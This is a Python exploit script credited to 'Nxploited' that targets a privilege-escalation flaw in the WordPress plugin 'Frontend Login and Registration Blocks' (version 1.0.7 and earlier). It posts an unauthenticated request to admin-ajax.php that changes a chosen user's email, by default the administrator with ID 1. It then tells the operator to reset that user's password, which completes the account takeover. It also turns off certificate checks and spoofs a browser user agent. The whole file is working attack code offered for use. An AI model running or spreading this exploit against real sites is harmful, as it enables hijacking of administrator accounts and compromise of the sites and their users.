import requests import argparse import sys #By: Khaled Alenazi (Nxploited) # Banner def print_banner(): banner = """ @@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@@@@ @@@@@@@ !@@ @@! @@@ @@! @@@ @@! @@@@ @@@ !@@ @@@ !@@ @@! @@@@ !@@ !@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@! @!@ !@! !@! @!@!@ !@! !@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ !!@@!! @!@!@!@!@ @!@!!@ !!@@!@! @!@ @! !@! !!@@!! !!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: @!!@!!! !!!@!@!!! !!@!@! @!!@!!!! !@!!! !!! @!!@!!! :!! :!: !!: !!: !:! !!:! !!! !:! !:! !!: !:! !:! !!:! !!! !:! :!: ::!!:! :!: :!: :!: !:! :!: !:! :!: :!: !:! :!: !:! !:! ::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: :::: :: :: :::: :::: ::: ::::::: :: :::: :: :: :: : : : :: :: :: : ::: : : : : :: : ::: :: : : : : : :: : : : : : : :: : : By: Khaled Alenazi (Nxploited) """ print(banner) def disable_ssl(): requests.packages.urllib3.disable_warnings() def create_session(): session = requests.Session() session.verify = False session.headers.update({'User-Agent': get_user_agent()}) return session def get_user_agent(): return "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 # By: Khaled Alenazi (Nxploited)" def parse_arguments(): parser = argparse.ArgumentParser( description="Frontend Login and Registration Blocks Plugin <= 1.0.7 is vulnerable to Privilege Escalation" ) parser.add_argument("--url", "-u", required=True, help="Target URL, e.g., http://192.168.100.74:888/wordpress") parser.add_argument("--user_id", "-id", default="1", help="User ID to target (default: 1)") parser.add_argument("--mail", "-mail", default="example@gmail.com", help="Email to set (default: example@gmail.com)") return parser.parse_args() def build_payload(user_id, email): payload = { 'action': 'flrblocksusersettingsupdatehandle', 'user_id': user_id, 'flr-blocks-email-update': email } return payload def send_exploit(session, url, payload): try: response = session.post(url + "/wp-admin/admin-ajax.php", data=payload) return response except Exception as e: print(f"Error sending request: {e}") sys.exit(1) def handle_response(response): if response.status_code == 200: if response.text.strip() != "0": print(f"Exploit successful! Response: {response.text}") print("Final Step: Go to the Forgot Password page and reset the admin password using the new email!") else: print("Exploit failed. Server responded with '0' — likely rejected request or missing parameters.") else: print(f"Exploit failed. HTTP Status: {response.status_code}") print(f"Response: {response.text}") def main(): print_banner() disable_ssl() args = parse_arguments() session = create_session() payload = build_payload(args.user_id, args.mail) response = send_exploit(session, args.url, payload) handle_response(response) if __name__ == "__main__": main()